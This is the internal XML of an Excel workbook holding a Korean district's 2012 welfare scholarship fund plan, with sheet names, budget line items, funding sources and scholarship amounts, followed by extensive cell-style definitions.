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65521" windowWidth="11775" windowHeight="4635" tabRatio="815" activeTab="0"/>
  </bookViews>
  <sheets>
    <sheet name="표지" sheetId="1" r:id="rId1"/>
    <sheet name="1.운용총칙" sheetId="2" r:id="rId2"/>
    <sheet name="2-가.자금수지총괄 " sheetId="3" r:id="rId3"/>
    <sheet name="2-나. 수입계획" sheetId="4" r:id="rId4"/>
    <sheet name="2-다. 지출계획" sheetId="5" r:id="rId5"/>
    <sheet name="3.연도별기금조성및집행현황" sheetId="6" r:id="rId6"/>
    <sheet name="4.예치금및예탁금명세서" sheetId="7" r:id="rId7"/>
    <sheet name="--------" sheetId="8" state="veryHidden" r:id="rId8"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Print_Area" localSheetId="1">'1.운용총칙'!$A$1:$G$24</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="2">'2-가.자금수지총괄 '!$A$1:$H$16</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="3">'2-나. 수입계획'!$A$1:$H$13</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="4">'2-다. 지출계획'!$A$1:$L$18</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="0">'표지'!$A$1:$N$13</definedName>
  </definedNames>
  <calcPr fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/comments4.xml><?xml version="1.0" encoding="utf-8"?>
<comments xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <authors>
    <author>예산</author>
  </authors>
  <commentList>
    <comment ref="E3" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <rFont val="굴림"/>
            <family val="3"/>
          </rPr>
          <t>2008년도 최종 수입액 추정치</t>
        </r>
      </text>
    </comment>
  </commentList>
</comments>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="157" uniqueCount="145">
  <si>
    <t>지  출  합  계</t>
  </si>
  <si>
    <t>산 출 내 역</t>
  </si>
  <si>
    <t>(단위 : 천원)</t>
  </si>
  <si>
    <t>항   목</t>
  </si>
  <si>
    <t>(단위 : 천원)</t>
  </si>
  <si>
    <t>2006년도 새청사건립기금운용계획-051229.xls</t>
  </si>
  <si>
    <t>Book1</t>
  </si>
  <si>
    <t>C:\Program Files\Microsoft Office\Office\xlstart\Book1.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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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수  입</t>
  </si>
  <si>
    <t>지  출</t>
  </si>
  <si>
    <t>증감(B)</t>
  </si>
  <si>
    <t xml:space="preserve">    나. 기금운용의 기본방향</t>
  </si>
  <si>
    <t xml:space="preserve">    다. 기금조성 및 운용</t>
  </si>
  <si>
    <t xml:space="preserve">  가. 자금수지총괄</t>
  </si>
  <si>
    <t>장</t>
  </si>
  <si>
    <t>관</t>
  </si>
  <si>
    <t>항</t>
  </si>
  <si>
    <t>목</t>
  </si>
  <si>
    <t>나. 수입계획</t>
  </si>
  <si>
    <t>부문</t>
  </si>
  <si>
    <t>정책</t>
  </si>
  <si>
    <t>단위</t>
  </si>
  <si>
    <t>세부</t>
  </si>
  <si>
    <t xml:space="preserve">   다. 지출계획</t>
  </si>
  <si>
    <t>301 일반보상금</t>
  </si>
  <si>
    <t>4. 예치금 및 예탁금 명세</t>
  </si>
  <si>
    <t>예치(탁)처</t>
  </si>
  <si>
    <t>예치 및 예탁액</t>
  </si>
  <si>
    <t>예치금</t>
  </si>
  <si>
    <t>예탁금</t>
  </si>
  <si>
    <t>소   계</t>
  </si>
  <si>
    <t>증   감
(B-A)</t>
  </si>
  <si>
    <t>비   고</t>
  </si>
  <si>
    <t>구   분</t>
  </si>
  <si>
    <t>602 예치금</t>
  </si>
  <si>
    <t>1. 운용총칙</t>
  </si>
  <si>
    <t>(1) 기금조성 현황</t>
  </si>
  <si>
    <t>비  고</t>
  </si>
  <si>
    <t>2. 자금운용계획</t>
  </si>
  <si>
    <t xml:space="preserve">수  입 </t>
  </si>
  <si>
    <t xml:space="preserve">지  출  </t>
  </si>
  <si>
    <t>편성목
통계목</t>
  </si>
  <si>
    <t>저소득자녀 장학금 지급</t>
  </si>
  <si>
    <t xml:space="preserve">    가. 기금설치 개요</t>
  </si>
  <si>
    <t>(1) 설치근거 : 부산광역시 사하구 복지장학기금 지급조례</t>
  </si>
  <si>
    <t>(2) 설치목적 : 저소득층 주민자녀 중 학업에 충실하고 품행이 바른 중.고등학교 학생에게 복지 장학금 지급</t>
  </si>
  <si>
    <t>(3) 설치년도 : 1993년</t>
  </si>
  <si>
    <t xml:space="preserve">    ○ 연간 적립기금의 이자수입금 및 전년도 이월금 범위내에서 장학금 지급</t>
  </si>
  <si>
    <t>(2) 재원조성 : 구 예산 출연금 3억원의 적립기금과 기금이자 수입금</t>
  </si>
  <si>
    <t>(3) 지원기준 : 저소득층 자녀 중 학업에 충실하고 품행이 바른자</t>
  </si>
  <si>
    <t>(4) 지원대상 : 우리구 거주 고등학교 재학생</t>
  </si>
  <si>
    <t>2010년도말
현재액</t>
  </si>
  <si>
    <t>2011년도말
현재액(A)</t>
  </si>
  <si>
    <t>2012년도말
현재액(B)</t>
  </si>
  <si>
    <t>2012년도 조성계획</t>
  </si>
  <si>
    <t>2012년도말 현재액
(A + B)</t>
  </si>
  <si>
    <t>주 민 복 지 과</t>
  </si>
  <si>
    <t xml:space="preserve">(2) 2012년도 기금사업 개요 </t>
  </si>
  <si>
    <t>(1) 기금사업의 목표 : 저소득층 주민 자녀 중 학업에 충실하고 품행이 바른 중·고등학교 학생에게 
                             복지장학금을  지급하여 학업증진에 기여</t>
  </si>
  <si>
    <t>(단위 :  천원)</t>
  </si>
  <si>
    <t>전년도
수입액</t>
  </si>
  <si>
    <t>수입액</t>
  </si>
  <si>
    <t>증 감</t>
  </si>
  <si>
    <t>전년도
지출액</t>
  </si>
  <si>
    <t>지출액</t>
  </si>
  <si>
    <t xml:space="preserve"> 출   연   금</t>
  </si>
  <si>
    <t xml:space="preserve"> 고유목적사업비</t>
  </si>
  <si>
    <t xml:space="preserve"> 보   조   금</t>
  </si>
  <si>
    <t xml:space="preserve"> 융   자   금</t>
  </si>
  <si>
    <t>차   입   금</t>
  </si>
  <si>
    <t>인력운영비</t>
  </si>
  <si>
    <t>융자금회수
(이자포함)</t>
  </si>
  <si>
    <t>기 본 경 비</t>
  </si>
  <si>
    <t>예탁금상환금</t>
  </si>
  <si>
    <t>예   탁   금</t>
  </si>
  <si>
    <t>예치금회수</t>
  </si>
  <si>
    <t>예   치   금</t>
  </si>
  <si>
    <t>예   수   금</t>
  </si>
  <si>
    <t>차입원리금상환</t>
  </si>
  <si>
    <t>이 자 수 입</t>
  </si>
  <si>
    <t xml:space="preserve"> 예수금원리금상환</t>
  </si>
  <si>
    <t>기 타 지 출</t>
  </si>
  <si>
    <t>수입항목</t>
  </si>
  <si>
    <t>전년도
수입액(A)</t>
  </si>
  <si>
    <t>수입액
(B)</t>
  </si>
  <si>
    <t>증  감
(B-A)</t>
  </si>
  <si>
    <t>산출내역</t>
  </si>
  <si>
    <t>200 세외수입</t>
  </si>
  <si>
    <t>210 경상적세외수입</t>
  </si>
  <si>
    <t>216 이자수입</t>
  </si>
  <si>
    <t>216-01
공공예금이자수입</t>
  </si>
  <si>
    <t>600 지방채및예치금회수</t>
  </si>
  <si>
    <t>630 예치금회수</t>
  </si>
  <si>
    <t>631 예치금회수</t>
  </si>
  <si>
    <t>631-01
예치금회수</t>
  </si>
  <si>
    <t>수 입 합 계</t>
  </si>
  <si>
    <t>○예치금 회수                                    301,950,000원</t>
  </si>
  <si>
    <t>조직</t>
  </si>
  <si>
    <t>증  감</t>
  </si>
  <si>
    <t>보전지출</t>
  </si>
  <si>
    <t>여유자금 예치</t>
  </si>
  <si>
    <t xml:space="preserve">   01 예치금</t>
  </si>
  <si>
    <t>주민복지과</t>
  </si>
  <si>
    <t>취약계층지원</t>
  </si>
  <si>
    <t>복지기반 조성</t>
  </si>
  <si>
    <t>복지장학금</t>
  </si>
  <si>
    <t xml:space="preserve">   02 장학금및학자금</t>
  </si>
  <si>
    <t xml:space="preserve">○장학금 지급                                             300,000원*30명      </t>
  </si>
  <si>
    <t xml:space="preserve">○ 예치금                                                     301,950,000원 </t>
  </si>
  <si>
    <t>3. 연도별 기금조성 및 집행현황</t>
  </si>
  <si>
    <t>(단위 : 천원)</t>
  </si>
  <si>
    <t>연도별</t>
  </si>
  <si>
    <t>조       성       액</t>
  </si>
  <si>
    <t>집        행        액</t>
  </si>
  <si>
    <t>잔  액
(A-B)</t>
  </si>
  <si>
    <t>계(A)</t>
  </si>
  <si>
    <t>출연금</t>
  </si>
  <si>
    <t>보조금</t>
  </si>
  <si>
    <t>차입금</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">융자금
회수
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <rFont val="HY견명조"/>
        <family val="1"/>
      </rPr>
      <t>(이자포함)</t>
    </r>
  </si>
  <si>
    <t>이자
수입</t>
  </si>
  <si>
    <t>기타</t>
  </si>
  <si>
    <t>계(B)</t>
  </si>
  <si>
    <t>고유목적
사 업 비</t>
  </si>
  <si>
    <t>융자금</t>
  </si>
  <si>
    <t>인력운영비  
및
기본경비</t>
  </si>
  <si>
    <t>차입금
원리금
상환</t>
  </si>
  <si>
    <t>2006년
까지</t>
  </si>
  <si>
    <t>부산은행</t>
  </si>
  <si>
    <t>재무활동(주민복지과)</t>
  </si>
  <si>
    <t>합    계</t>
  </si>
  <si>
    <t>○은행예치금 이자수입                300,000,000원 * 3%</t>
  </si>
  <si>
    <t>합 계</t>
  </si>
  <si>
    <t xml:space="preserve"> 기 타 수 입</t>
  </si>
  <si>
    <t>복지장학기금 운용계획</t>
  </si>
</sst>
</file>

<file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <numFmts count="3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;&quot;△&quot;\-#,##0"/>
    <numFmt numFmtId="178" formatCode="#,##0;&quot;△&quot;#,##0"/>
    <numFmt numFmtId="179" formatCode="#,##0;&quot;△&quot;#,##0;"/>
    <numFmt numFmtId="180" formatCode="_-* #,##0.00\ &quot;DM&quot;_-;\-* #,##0.00\ &quot;DM&quot;_-;_-* &quot;-&quot;??\ &quot;DM&quot;_-;_-@_-"/>
    <numFmt numFmtId="181" formatCode="&quot;₩&quot;#,##0.00;[Red]&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;\-#,##0.00"/>
    <numFmt numFmtId="182" formatCode="[$-412]yyyy&quot;년&quot;\ m&quot;월&quot;\ d&quot;일&quot;\ dddd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,##0_ "/>
    <numFmt numFmtId="188" formatCode="##,#0_;&quot;△&quot;#,##0"/>
    <numFmt numFmtId="189" formatCode="#,##0;&quot;△&quot;0,###"/>
    <numFmt numFmtId="190" formatCode="#,##0_ ;&quot;△&quot;0,###"/>
    <numFmt numFmtId="191" formatCode="##,#0_;&quot;△&quot;0,###\ "/>
    <numFmt numFmtId="192" formatCode="#,##0_);[Red]\(#,##0\)"/>
    <numFmt numFmtId="193" formatCode="#,##0_);\(#,##0\)"/>
    <numFmt numFmtId="194" formatCode="&quot;₩&quot;#,##0.00;&quot;△&quot;#,##0.00"/>
    <numFmt numFmtId="195" formatCode="&quot;₩&quot;#,##0.00;&quot;△&quot;#,##0"/>
    <numFmt numFmtId="196" formatCode="_-&quot;₩&quot;* #,##0_-;&quot;△&quot;* #,##0_-;_-&quot;₩&quot;* &quot;-&quot;_-;_-@_-"/>
  </numFmts>
  <fonts count="65">
    <font>
      <sz val="11"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="8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2"/>
      <name val="뼻뮝"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="¹UAAA¼"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="돋움"/>
      <family val="3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20"/>
      <name val="HY견명조"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="HY견명조"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="17"/>
      <name val="HY견명조"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="15"/>
      <name val="HY견명조"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="13"/>
      <name val="HY견명조"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="HY견명조"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="13"/>
      <name val="HY견명조"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="HY견명조"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="16"/>
      <name val="HY견명조"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <name val="HY견명조"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="15"/>
      <name val="HY견명조"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="HY헤드라인M"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="36"/>
      <name val="HY견명조"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="28"/>
      <name val="HY견명조"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="굴림"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="24"/>
      <name val="HY견명조"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <name val="HY견명조"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="바탕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8"/>
      <name val="돋움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thin"/>
      <top style="double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uble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52" fillId="29" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="53" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="54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0" borderId="4" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="3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31" borderId="1" applyNumberFormat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32" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="63" fillId="26" borderId="9" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="180" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="181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0" fontId="2" fillId="0" borderId="0" applyNumberForma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>
      <alignment/>
      <protection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7" fillId="0" borderId="10" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="11">
      <alignment horizontal="left" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
  </cellStyleXfs>
  <cellXfs count="203">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="33" borderId="0" xfId="66" applyFont="1" applyFill="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="66">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="33" borderId="0" xfId="66" applyFill="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="34" borderId="12" xfId="66" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="35" borderId="13" xfId="66" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="36" borderId="14" xfId="66" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="37" borderId="15" xfId="66" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="36" borderId="15" xfId="66" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="36" borderId="16" xfId="66" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="35" borderId="17" xfId="66" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="34" borderId="18" xfId="66" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="35" borderId="18" xfId="66" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="34" borderId="19" xfId="66" applyFill="1" applyBorder="1">
      <alignment/>
      <protection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20" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="20" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="16" fillId="0" borderId="20" xfId="49" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="41" fontId="16" fillId="0" borderId="20" xfId="49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Fill="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="19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12" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment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15" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="15" fillId="0" borderId="20" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="15" fillId="0" borderId="21" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="3" fontId="15" fillId="0" borderId="19" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="3" fontId="15" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="15" fillId="0" borderId="20" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="15" fillId="0" borderId="22" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0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Border="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="distributed" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="23" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="24" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="18" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="18" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="16" fillId="0" borderId="20" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="16" fillId="0" borderId="21" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="16" fillId="0" borderId="18" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="16" fillId="0" borderId="25" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="16" fillId="0" borderId="26" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="16" fillId="0" borderId="27" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="34" borderId="28" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="34" borderId="29" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="34" borderId="29" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="34" borderId="30" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="18" fillId="0" borderId="31" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="41" fontId="18" fillId="0" borderId="17" xfId="50" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="16" fillId="0" borderId="32" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="16" fillId="0" borderId="20" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="16" fillId="0" borderId="20" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="16" fillId="0" borderId="20" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="16" fillId="0" borderId="20" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="16" fillId="0" borderId="21" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="16" fillId="0" borderId="32" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="16" fillId="0" borderId="33" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="16" fillId="0" borderId="19" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="16" fillId="0" borderId="19" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="16" fillId="0" borderId="19" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="16" fillId="0" borderId="22" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="41" fontId="16" fillId="0" borderId="21" xfId="50" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="41" fontId="15" fillId="0" borderId="20" xfId="50" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="32" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="27" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="41" fontId="16" fillId="0" borderId="20" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="16" fillId="0" borderId="18" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="23" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="24" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
